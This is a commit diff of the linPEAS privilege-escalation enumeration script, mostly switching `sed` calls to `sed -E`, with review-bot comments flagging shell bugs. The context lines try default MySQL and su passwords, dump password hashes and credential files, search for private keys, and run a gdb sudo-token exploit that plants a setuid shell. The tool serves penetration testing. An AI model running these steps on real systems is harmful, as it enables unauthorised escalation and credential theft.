linpeas2.7.8

carlospolop 2020-09-08 04:47:57 -04:00
parent 65c5fc894a
commit 6f102371d7


@ -445,7 +445,7 @@ su_try_pwd (){
PASSWORDTRY=$2
trysu=`echo "$PASSWORDTRY" | timeout 1 su $USER -c whoami 2>/dev/null`
if [ "$trysu" ]; then
echo " You can login as $USER using password: $PASSWORDTRY" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
echo " You can login as $USER using password: $PASSWORDTRY" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
fi
}
@ -564,7 +564,7 @@ discover_network (){
#Using fping if possible
if [ "$FPING" ]; then
$FPING -a -q -g $DISCOVERY | sed "s,.*,${C}[1;31m&${C}[0m,"
$FPING -a -q -g $DISCOVERY | sed -E "s,.*,${C}[1;31m&${C}[0m,"
#Loop using ping
else
@ -1008,8 +1008,8 @@ if [ "`echo $CHECKS | grep SysI`" ]; then
printf $Y"[+] "$GREEN"Is this a container? ........... "$NC
dockercontainer=`grep -i docker /proc/self/cgroup 2>/dev/null; find / -maxdepth 3 -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`
lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`
if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" | sed "s,.*,${C}[1;31m&${C}[0m,";
elif [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" | sed "s,.*,${C}[1;31m&${C}[0m,";
if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" | sed -E "s,.*,${C}[1;31m&${C}[0m,";
elif [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" | sed -E "s,.*,${C}[1;31m&${C}[0m,";
else echo_no
fi
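Review bot: The `elif [ "$lxccontainer" ]` branch on the re-flagged line can never be taken, because the context line above assigns `lxccontainer` from `grep -qa container=lxc /proc/1/environ`, and `-q` suppresses all output, so the variable is always empty. An LXC guest therefore falls through to `echo_no`. Test the exit status instead of the captured text, e.g. `elif grep -qa container=lxc /proc/1/environ 2>/dev/null; then`. The enclosing SysI block starts and ends outside this hunk.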
@ -1026,11 +1026,11 @@ if [ "`echo $CHECKS | grep SysI`" ]; then
if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
echo "Yes $containerCounts" | sed "s,.*,${C}[1;31m&${C}[0m,"
echo "Yes $containerCounts" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
# List any running containers
if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed "s,.*,${C}[1;31m&${C}[0m,"; docker ps | tail -n +2 2>/dev/null; echo ""; fi
if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed "s,.*,${C}[1;31m&${C}[0m,"; lxc list 2>/dev/null; echo ""; fi
if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed "s,.*,${C}[1;31m&${C}[0m,"; rkt list 2>/dev/null; echo ""; fi
if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; docker ps | tail -n +2 2>/dev/null; echo ""; fi
if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; lxc list 2>/dev/null; echo ""; fi
if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; rkt list 2>/dev/null; echo ""; fi
fi
echo ""
@ -1168,7 +1168,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then
for s in $services; do
if [ ! -O "$s" ]; then #Remove services that belongs to the current user
if [ -w "$s" ] && [ -f "$s" ]; then
echo "$s" | sed "s,.*,${C}[1;31;103m&${C}[0m,g"
echo "$s" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,g"
fi
servicebinpaths="`grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" #Get invoked paths
for sp in $servicebinpaths; do
@ -1180,14 +1180,14 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then
relpath2="`grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' \"$s\" 2>/dev/null | grep -Ev \"/[a-zA-Z0-9_]+/\"`"
if [ "$relpath1" ] || [ "$relpath2" ]; then
if [ "$WRITABLESYSTEMDPATH" ]; then
echo "$s is executing some relative path" | sed "s,.*,${C}[1;31m&${C}[0m,";
echo "$s is executing some relative path" | sed -E "s,.*,${C}[1;31m&${C}[0m,";
else
echo "$s is executing some relative path"
fi
fi
fi
done
if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed "s,.*,${C}[1;32m&${C}[0m,"; fi
if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -E "s,.*,${C}[1;32m&${C}[0m,"; fi
echo ""
#-- PSC) Timers
@ -1202,7 +1202,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then
timers=$(echo "$FIND_ETC $FIND_LIB $FIND_RUN $FIND_USR $FIND_SYSTEMD $FIND_SYSTEM $FIND_PRIVATE $FIND_VAR $FIND_SYS $FIND_SNAP" | grep -E '\.timer')
for t in $timers; do
if [ -w "$t" ]; then
echo "$t" | sed "s,.*,${C}[1;31m&${C}[0m,g"
echo "$t" | sed -E "s,.*,${C}[1;31m&${C}[0m,g"
fi
timerbinpaths="`grep -Po '^Unit=*(.*?$)' \"$t\" 2>/dev/null | cut -d '=' -f2`"
for tb in $timerbinpaths; do
@ -1265,7 +1265,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then
for d in "$dbusfols"; do
for f in $d/*; do
if [ -w "$f" ]; then
echo "Writable $f" | sed "s,.*,${C}[1;31m&${C}[0m,g"
echo "Writable $f" | sed -E "s,.*,${C}[1;31m&${C}[0m,g"
fi
genpol=`grep "<policy>" "$f" 2>/dev/null`
@ -1355,7 +1355,7 @@ if [ "`echo $CHECKS | grep Net`" ]; then
timeout 1 tcpdump >/dev/null 2>&1
if [ $? -eq 124 ]; then #If 124, then timed out == It worked
printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing\n"$NC
echo "You can sniff with tcpdump!" | sed "s,.*,${C}[1;31m&${C}[0m,"
echo "You can sniff with tcpdump!" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
echo ""
@ -1402,11 +1402,11 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then
fi
(cat /etc/sudoers | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -E "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -E "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "/etc/sudoers"
if [ -w '/etc/sudoers.d/' ]; then
echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
fi
for filename in '/etc/sudoers.d/*'; do
if [ -r "$filename" ]; then
echo "Sudoers file: $filename is readable" | sed "s,.*,${C}[1;31m&${C}[0m,g"
echo "Sudoers file: $filename is readable" | sed -E "s,.*,${C}[1;31m&${C}[0m,g"
cat "$filename" | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -E "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -E "s,$sudoVB,${C}[1;31;103m&${C}[0m,"
fi
done
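Review bot: The loop header `for filename in '/etc/sudoers.d/*'; do` single-quotes the glob, so it never expands. The body runs once with the literal string, `[ -r "$filename" ]` tests a path that does not exist, and the "Sudoers file: ... is readable" line touched here is effectively dead. Write it as `for filename in /etc/sudoers.d/*; do` and keep the `-r` test to cover the no-match case. The logstash hunk has the same quoted-glob problem in `cat "$d/conf.d/out*"` and `cat "$d/conf.d/filt*"`. The enclosing UsrI block starts and ends outside this hunk.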
@ -1420,7 +1420,7 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then
else echo "/proc/sys/kernel/yama/ptrace_scope is not enabled ($ptrace_scope)" | sed "s,is not enabled,${C}[1;32m&${C}[0m,g";
fi
is_gdb="`which gdb 2>/dev/null`"
if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed "s,.*,${C}[1;31m&${C}[0m,g";
if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -E "s,.*,${C}[1;31m&${C}[0m,g";
else echo "gdb wasn't found in PATH" | sed "s,gdb,${C}[1;32m&${C}[0m,g";
fi
if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then
@ -1430,7 +1430,7 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then
echo 'call system("echo | sudo -S cp /bin/sh /tmp/shrndom >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/shrndom >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1
done
if [ -f "/tmp/shrndom" ]; then
echo "Sudo tokens exploit worked, you can escalate privileges using '/tmp/shrndom -p'" | sed "s,.*,${C}[1;31;103m&${C}[0m,";
echo "Sudo tokens exploit worked, you can escalate privileges using '/tmp/shrndom -p'" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,";
else echo "The escalation didn't work... (try again later?)"
fi
fi
@ -1536,8 +1536,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
printf $Y"[+] "$GREEN"MySQL connection using default root/root ........... "$NC
mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null`
if [ "$mysqlconnect" ]; then
echo "Yes" | sed "s,.*,${C}[1;31m&${C}[0m,"
mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
@ -1545,8 +1545,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
printf $Y"[+] "$GREEN"MySQL connection using root/toor ................... "$NC
mysqlconnect=`mysqladmin -uroot -ptoor version 2>/dev/null`
if [ "$mysqlconnect" ]; then
echo "Yes" | sed "s,.*,${C}[1;31m&${C}[0m,"
mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
@ -1554,8 +1554,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null`
printf $Y"[+] "$GREEN"MySQL connection using root/NOPASS ................. "$NC
if [ "$mysqlconnectnopass" ]; then
echo "Yes" | sed "s,.*,${C}[1;31m&${C}[0m,"
mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
@ -1567,14 +1567,14 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
dcnf=`find $d -name debian.cnf 2>/dev/null`
for f in $dcnf; do
if [ -r $f ]; then
echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed "s,.*,${C}[1;31m&${C}[0m,"
echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
cat "$f"
fi
done
uMYD=`find $d -name user.MYD 2>/dev/null`
for f in $uMYD; do
if [ -r "$f" ]; then
echo "We can read the Mysql Hashes from $f" | sed "s,.*,${C}[1;31m&${C}[0m,"
echo "We can read the Mysql Hashes from $f" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password"
fi
done
@ -1595,7 +1595,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
mysqlexec=`whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so"`
if [ "$mysqlexec" ]; then
echo "Found $mysqlexec"
echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed "s,.*,${C}[1;31m&${C}[0m,"
echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
fi
done
else echo_not_found
@ -1609,7 +1609,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
postgconfs=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$')
if [ "$postgver" ] || [ "$postgdb" ] || [ "$postgconfs" ]; then
if [ "$postgver" ]; then echo "Version: $postgver"; fi
if [ "$postgdb" ]; then echo "PostgreSQL database: $postgdb" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi
if [ "$postgdb" ]; then echo "PostgreSQL database: $postgdb" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi
for f in $postgconfs; do
if [ -r "$f" ]; then
echo "Found readable $f"
@ -1625,7 +1625,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it.
#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
printf $Y"[+] "$GREEN"PostgreSQL connection to template0 using postgres/NOPASS ........ "$NC
if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed "s,.*,${C}[1;31m&${C}[0m,"
if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
@ -1635,12 +1635,12 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
fi
printf $Y"[+] "$GREEN"PostgreSQL connection to template0 using pgsql/NOPASS ........... "$NC
if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed "s,.*,${C}[1;31m&${C}[0m,"
if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
printf $Y"[+] "$GREEN"PostgreSQL connection to template1 using pgsql/NOPASS ........... "$NC
if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed "s,.*,${C}[1;31m&${C}[0m,"
if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
echo ""
@ -1679,7 +1679,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
wp=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'wp-config\.php$')
if [ "$wp" ]; then
echo "wp-config.php files found:\n$wp"
for f in $wp; do grep "PASSWORD\|USER\|NAME\|HOST" "$f" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"; done
for f in $wp; do grep "PASSWORD\|USER\|NAME\|HOST" "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done
else echo_not_found "wp-config.php"
fi
echo ""
@ -1689,7 +1689,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
drup=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'settings\.php$')
if [ "`echo $drup | grep '/default/settings.php'`" ]; then #Check path /default/settings.php
echo "settings.php files found:\n$drup"
for f in $drup; do grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" $f 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"; done
for f in $drup; do grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" $f 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done
else echo_not_found "/default/settings.php"
fi
echo ""
@ -1699,7 +1699,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
tomcat=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'tomcat-users\.xml$')
if [ "$tomcat" ]; then
echo "tomcat-users.xml file found: $tomcat"
for f in $tomcat; do grep "username=" "$f" 2>/dev/null | grep "password=" | sed "s,.*,${C}[1;31m&${C}[0m,"; done
for f in $tomcat; do grep "username=" "$f" 2>/dev/null | grep "password=" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done
else echo_not_found "tomcat-users.xml"
fi
echo ""
@ -1743,7 +1743,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
for f in $rsyncd; do
printf "$f\n"
if [ `echo "$f" | grep -i "secrets"` ]; then
cat "$f" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
cat "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
else
cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,secrets.*|auth.*users.*=,${C}[1;31m&${C}[0m,"
fi
@ -1788,7 +1788,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
vnc=$(echo "$FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_USERS" | grep -E '\.vnc')
if [ "$vnc" ]; then
printf "$vnc\n"
for d in $vnc; do find "$d" -name "passwd" -exec ls -l {} \; 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"; done
for d in $vnc; do find "$d" -name "passwd" -exec ls -l {} \; 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done
else echo_not_found ".vnc"
fi
echo ""
@ -1811,7 +1811,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
printf "$ovpn\n"
for f in $ovpn; do
if [ -r "$f" ]; then
cat "$f" 2>/dev/null | grep "auth-user-pass" | sed "s,auth-user-pass.*,${C}[1;31m&${C}[0m,";
cat "$f" 2>/dev/null | grep "auth-user-pass" | sed -E "s,auth-user-pass.*,${C}[1;31m&${C}[0m,";
fi
done
else echo_not_found ".ovpn"
@ -1835,7 +1835,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
printf "$ssh\n"
fi
grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${C}[1;31m&${C}[0m,"
grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -E "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${C}[1;31m&${C}[0m,"
if [ "$TIMEOUT" ]; then
privatekeyfilesetc=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null`
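Review bot: The alternation in the sshd_config highlight pattern still contains the misspelling `FordwardAgent.*es`, so a `ForwardAgent yes` line selected by the preceding grep is never coloured, even now that `-E` makes the `|` branches effective. Change that branch to `ForwardAgent.*es`. On the same line the grep filter lists `AuthorizedKeysFiles`, while the sshd keyword is `AuthorizedKeysFile`, so that setting is presumably never selected either; drop the trailing `s`. The `if [ "$TIMEOUT" ]` block that follows continues outside this hunk.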
@ -1848,11 +1848,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
fi
if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then
printf "Possible private SSH keys were found!\n" | sed "s,.*,${C}[1;31m&${C}[0m,"
if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi
if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi
if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi
if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi
printf "Possible private SSH keys were found!\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi
if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi
if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi
if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi
fi
if [ "$certsb4_grep" ] || [ "$certsbin" ]; then
echo " --> Some certificates were found (out limited):"
@ -1879,13 +1879,13 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
if [ "$hostsdenied" ]; then
echo " --> /etc/hosts.denied file found, read the rules:"
printf "$homesshconfig\n"
cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -v "^$" | sed "s,.*,${C}[1;32m&${C}[0m,"
cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -E "s,.*,${C}[1;32m&${C}[0m,"
echo ""
fi
if [ "$hostsallow" ]; then
echo " --> /etc/hosts.allow file found, read the rules:"
printf "$homesshconfig\n"
cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -v "^$" | sed "s,.*,${C}[1;31m&${C}[0m,"
cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
echo ""
fi
if [ "$sshconfig" ]; then
@ -1899,7 +1899,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
printf $Y"[+] "$GREEN"Searching unexpected auth lines in /etc/pam.d/sshd\n"$NC
pamssh=`cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth`
if [ "$pamssh" ]; then
cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed "s,.*,${C}[1;31m&${C}[0m,"
cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed -E "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
echo ""
@ -1912,7 +1912,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
if [ -f "$f" ]; then #Check if file, here we only look for filenames, not dirs
printf "Trying to read $f\n" | sed -E "s,credentials|credentials.db|legacy_credentials.db|access_tokens.db|accessTokens.json|azureProfile.json,${C}[1;31m&${C}[0m,g"
if [ -r "$f" ]; then
cat "$f" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,g"
cat "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,g"
fi
echo ""
fi
@ -1923,7 +1923,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
#-- SI) NFS exports
printf $Y"[+] "$GREEN"NFS exports?\n"$NC
printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe\n"$NC
if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -E "s,no_root_squash|no_all_squash ,${C}[1;31;103m&${C}[0m," | sed "s,insecure,${C}[1;31m&${C}[0m,"
if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -E "s,no_root_squash|no_all_squash ,${C}[1;31;103m&${C}[0m," | sed -E "s,insecure,${C}[1;31m&${C}[0m,"
else echo_not_found "/etc/exports"
fi
echo ""
@ -1935,7 +1935,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
if [ "$krb5" ]; then
for f in $krb5; do
if [ -r "$f" ]; then
cat "$f" 2>/dev/null | grep default_ccache_name | sed "s,default_ccache_name,${C}[1;31m&${C}[0m,";
cat "$f" 2>/dev/null | grep default_ccache_name | sed -E "s,default_ccache_name,${C}[1;31m&${C}[0m,";
fi
done
else echo_not_found "krb5.conf"
@ -1966,8 +1966,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
h=$(grep -R -i "defaults_file=" $f | cut -b 15-) ##Search string to know where is the default knock file - example - DEFAULTS_FILE=/etc/default/knockd
i=$(grep -R -i "please edit" $h | awk '{print $4}') ##Search string to know where is config file - example - # PLEASE EDIT /etc/knockd.conf BEFORE ENABLING
j=$(grep -R -i "sequence" $i) ##If we want we can show sequence number - 'hidded'
printf "Config Knock file found!: \n$i\n" | sed "s,.*,${C}[1;31m&${C}[0m,"
printf " Sequence found!: \n$j\n" | sed "s,.*,${C}[1;31m&${C}[0m,"
printf "Config Knock file found!: \n$i\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
printf " Sequence found!: \n$j\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
done
else echo_not_found "Knock.config"
fi
@ -1981,7 +1981,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
for d in $logstash; do
if [ -r "$d/startup.options" ]; then
echo "Logstash is running as user:"
cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m,"
cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed -E "s,$USER,${C}[1;95m&${C}[0m," | sed -E "s,root,${C}[1;31m&${C}[0m,"
fi
cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -E "s,exec\W*\{|command\W*=>,${C}[1;31m&${C}[0m,"
cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -E"s,path\W*=>|code\W*=>|ruby\W*\{,${C}[1;31m&${C}[0m,"
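Review bot: The last context line calls `sed -E"s,path\W*=>|code\W*=>|ruby\W*\{,...` with no space after `-E`, so sed receives the script glued onto the option cluster instead of as a separate script argument. The filter-file highlight is likely to fail rather than colour anything; insert the space (`sed -E "s,path...`), as the `out*` line above it does. On the changed line, `sed -E "s,$USER,...` now interprets the user name as an extended regex, so a name containing `.` or `+` can match differently than intended. Escaping it first would keep the highlight literal. The surrounding `for d in $logstash` loop ends outside this hunk.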
@ -2013,7 +2013,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
for f in $vaultssh; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done
echo ""
vault secrets list 2>/dev/null
echo "$FIND_ETC $FIND_USR $FIND_HOME $FIND_ROOT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '\.vault-token' | sed "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null
echo "$FIND_ETC $FIND_USR $FIND_HOME $FIND_ROOT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '\.vault-token' | sed -E "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null
